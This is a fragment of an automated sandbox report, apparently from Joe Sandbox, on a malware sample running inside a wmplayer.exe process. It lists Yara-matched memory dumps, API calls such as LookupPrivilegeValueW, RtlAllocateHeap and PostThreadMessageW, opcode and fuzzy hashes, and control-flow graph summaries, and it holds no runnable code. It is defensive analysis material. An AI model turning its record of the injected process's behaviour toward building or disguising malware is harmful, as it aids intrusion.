            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
            • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
            APIs
            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: d411ce7cfc3c1acaf5d27afaf8a16f173a9a0c2da8ae514c80f19ff65f75a5ea
            • Instruction ID: b4f01c59d2f6d960dd549f2a89ac2df62a0c015f12d971f71681c95f20bdc505
            • Opcode Fuzzy Hash: d411ce7cfc3c1acaf5d27afaf8a16f173a9a0c2da8ae514c80f19ff65f75a5ea
            • Instruction Fuzzy Hash: 05E08C76241204AFD710EBE5CD86EEB7B68EF48320F00405AB918AB241C230E611CB90
            APIs
            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: Close
            • String ID:
            • API String ID: 3535843008-0
            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
            • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
            • Instruction ID: 7eb52d04d60ca75482778d91298d49fd108de93608ceab9f92ba9fe99ba145e6
            • Opcode Fuzzy Hash: 4c7312ddbb3afe5429c1155ced8956f1162fc0b6478b827c5c65c9913fb69af5
            • Instruction Fuzzy Hash: FE90023120140C06D180B298444468A000687D1301FE5C055A1029658DCB158B5D77A2
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
            • Instruction ID: 66871c75473c08b40d51fe63dc972a439c0af9b2931c27f22c3969a41cc9069c
            • Opcode Fuzzy Hash: c1e5b7597785240be0e9ec2235edd01c1abb81e717ad92d7f2c7ee12047d5502
            • Instruction Fuzzy Hash: A7900261202404074105B2984454656400B87E0301BA5C061E2018594DC62589956126
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
            • Instruction ID: 3e612b026a88bdadf96c965caab8a10e5884b125d13caf99908ce47cebabe6c2
            • Opcode Fuzzy Hash: 9ebf286e65d6254d4643b7ad5fc3dd27d83fd5ab9063691c3b63abd3fd38549a
            • Instruction Fuzzy Hash: CF900225211404070105F6980744547004787D53513A5C061F2019554CD72189655122
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
            • Instruction ID: 71d17e0d2903fbab4afcaf945aa91b5834b15ebe84d9840b995263593ae47f91
            • Opcode Fuzzy Hash: 99224844d09609cda847ec77872c587c77fb1478a8190df281f21249b47d4a8f
            • Instruction Fuzzy Hash: DE90023120180806D100B298485474B000687D0302FA5C051A2168559D872589556572
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
            • Instruction ID: 1983b86864fdc9697310b1b4b75938a59cfe60ef6225062f04e6626637098400
            • Opcode Fuzzy Hash: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
            • Instruction Fuzzy Hash: 34900221601404464140B2A888849464006ABE13117A5C161A199C554D865989695666
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
            • Instruction ID: 06a82161c8354bf48f8a640caecd29b186795f737c55a36de0b728ea611bfb51
            • Opcode Fuzzy Hash: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
            • Instruction Fuzzy Hash: 8E900221211C0446D200B6A84C54B47000687D0303FA5C155A1158558CCA1589655522
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
            • Instruction ID: 244c40a51976ae1ed193d35ec2f1ca08503bd4a18e9eed2f49205e8685346ae7
            • Opcode Fuzzy Hash: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
            • Instruction Fuzzy Hash: 1890026134140846D100B2984454B460006C7E1301FA5C055E2068558D8719CD566127
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
            • Instruction ID: cfd5cf455fc320a9792499c68348bcdd9cc08754e4fae1bc4804885e1d4af621
            • Opcode Fuzzy Hash: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
            • Instruction Fuzzy Hash: 8790022160140906D101B2984444656000B87D0341FE5C062A2028559ECB258A96A132
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
            • Instruction ID: cd65a714a82f43856e199d71a65957981f1eadf78cd555ea4db75f261dd8fc35
            • Opcode Fuzzy Hash: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
            • Instruction Fuzzy Hash: A090027120140806D140B2984444786000687D0301FA5C051A6068558E87598ED96666
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
            • Instruction ID: de6efbafae872ce13a6d9fceaed45a35838300e8da87186796d146a0d8585e5b
            • Opcode Fuzzy Hash: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
            • Instruction Fuzzy Hash: BD900221242445565545F2984444547400797E03417E5C052A2418954C8626995AD622
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
            • Instruction ID: 7152e8f79309b5124c13b769bd57648f4b61710c2819786d3777204fada2906f
            • Opcode Fuzzy Hash: c135aeca0045f0a8c4d147d499c42d4321a773d51b060400ed67cf65d732a290
            • Instruction Fuzzy Hash: 0C90023120140817D111B2984544747000A87D0341FE5C452A142855CD97568A56A122
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
            • Instruction ID: 5b39f8da44cc78659186dc51bff5a1cef7ef990bff7038e8476aaa2073fe378a
            • Opcode Fuzzy Hash: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
            • Instruction Fuzzy Hash: 5E90022921340406D180B298544864A000687D1302FE5D455A101955CCCA15896D5322
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
            • Instruction ID: be3e35b29f021ff316d4fa2fbd53553878e98f524441bca3279f131d092092b3
            • Opcode Fuzzy Hash: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
            • Instruction Fuzzy Hash: B090022130140407D140B29854586464006D7E1301FA5D051E1418558CDA15895A5223
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
            • Instruction ID: 7f95b53d0430a81cbac8962aed0cccc017eb08aaad18d6c03b4be93260020524
            • Opcode Fuzzy Hash: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
            • Instruction Fuzzy Hash: EC90023120140806D100B6D85448686000687E0301FA5D051A6028559EC76589956132
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
            • Instruction ID: 725ff3065874a0cb7581fd670df5d6917cfadb3ec04f454cd1351a7b2b59b057
            • Opcode Fuzzy Hash: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
            • Instruction Fuzzy Hash: C390023120148C06D110B298844478A000687D0301FA9C451A542865CD879589957122
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
            • Instruction ID: d58fe8e4865b7a2b9ec26276515fb776abeb1cc765f7a728b76389d142a7d987
            • Opcode Fuzzy Hash: bd94853dc0a5bd11354a55791940ee758e33ee4005cfa9d67f5cf96289ab4c5c
            • Instruction Fuzzy Hash: 03213AB2D4020857CB25DA64AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 207 41a600-41a631 call 41af30 RtlAllocateHeap
            APIs
            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID: 6EA
            • API String ID: 1279760036-1400015478
            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
            • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 210 41a672-41a673 211 41a653-41a656 210->211 212 41a675-41a6a8 call 41af30 ExitProcess 210->212 213 41a65c-41a671 RtlFreeHeap 211->213 214 41a657 call 41af30 211->214 214->213
            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: ExitFreeHeapProcess
            • String ID:
            • API String ID: 1180424539-0
            • Opcode ID: 4724de83f279594ad4d88937b01ba56aa79782106da425acb9c3b8f61ff1dfc5
            • Instruction ID: 3b561ed820cf4f22d487782b8bbc06652ed4f15ec1ac5af2381640b30d6f14ad
            • Opcode Fuzzy Hash: 4724de83f279594ad4d88937b01ba56aa79782106da425acb9c3b8f61ff1dfc5
            • Instruction Fuzzy Hash: 57F0AFB02112047FC721EF69CC81EDB3B69DF85754F10815AFC4897242C231D911CAE1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 412 40830b-40835a call 41be40 call 41c9e0 call 40acf0 call 414e50 421 40835c-40836e PostThreadMessageW 412->421 422 40838e-408392 412->422 423 408370-40838a call 40a480 421->423 424 40838d 421->424 423->424 424->422
            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 65f9a2811ef9d1d5c9a1b268f4800a4e3dbd7ff1467ff529169926873c16c9e3
            • Instruction ID: 4edaf1d8238e945c623d9befb7d6078b409c85ea64aa95a625cca38b3500d8d3
            • Opcode Fuzzy Hash: 65f9a2811ef9d1d5c9a1b268f4800a4e3dbd7ff1467ff529169926873c16c9e3
            • Instruction Fuzzy Hash: 2E01B531A8032877E720A6959C43FEE776C5B44F54F05011AFF04BA1C1E6A8690546EA

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 437 408310-40831f 438 408328-40835a call 41c9e0 call 40acf0 call 414e50 437->438 439 408323 call 41be40 437->439 446 40835c-40836e PostThreadMessageW 438->446 447 40838e-408392 438->447 439->438 448 408370-40838a call 40a480 446->448 449 40838d 446->449 448->449 449->447
            APIs
            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: MessagePostThread
            • String ID:
            • API String ID: 1836367815-0
            • Opcode ID: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
            • Instruction ID: ee4297080f87ae1612e18f34f2b0feab3a9f48bf419a2075f585a901aa565cbe
            • Opcode Fuzzy Hash: 45924242aede014db28918b29a4ce2ef13cb4ce8d3c4182a16cec86e1105876c
            • Instruction Fuzzy Hash: C201A771A8032877E720A6959C43FFF776C5B40F54F05012EFF04BA1C2EAA8690546FA

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 467 41a791-41a793 468 41a795-41a799 467->468 469 41a73e-41a744 467->469 472 41a79b-41a7ba call 41af30 468->472 473 41a72f-41a73c 468->473 475 41a7bf-41a7d4 LookupPrivilegeValueW 472->475 473->469
            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: e27772e3287ab67bfa5b8d9fc4f2c8ec6fc4a70a0c885e02ef389afb1bf96d86
            • Instruction ID: c7bb0476fe581877dad0db914ec54adeb95ff91b4db81a5ec4398ae27d82247d
            • Opcode Fuzzy Hash: e27772e3287ab67bfa5b8d9fc4f2c8ec6fc4a70a0c885e02ef389afb1bf96d86
            • Instruction Fuzzy Hash: 2FF0AFB5200204AFDB24DF68CC81EE777A9EF88314F11856AFD9C97241D635E861CBB1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 482 41a7d6-41a7d8 483 41a797-41a799 482->483 484 41a7da 482->484 485 41a79b-41a7ba call 41af30 483->485 486 41a72f-41a744 483->486 489 41a7bf-41a7d4 LookupPrivilegeValueW 485->489
            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: de6026ab64bc3f0a855ba533ffe51ca228245a8baf93753d814affe18a0e800b
            • Instruction ID: c215c0639032c4aa668ba42cf2a19f07f963aad7dd3b101d89bd6c430a74d262
            • Opcode Fuzzy Hash: de6026ab64bc3f0a855ba533ffe51ca228245a8baf93753d814affe18a0e800b
            • Instruction Fuzzy Hash: 2FF027752012446FDB11DF18CC40FE77BA5EF45310F10405AF98C97241C935D461C7B5
            APIs
            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
            • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
            APIs
            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: LookupPrivilegeValue
            • String ID:
            • API String ID: 3899507212-0
            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
            • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
            • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
            APIs
            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
            Memory Dump Source
            • Source File: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
            • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
            • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
            APIs
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
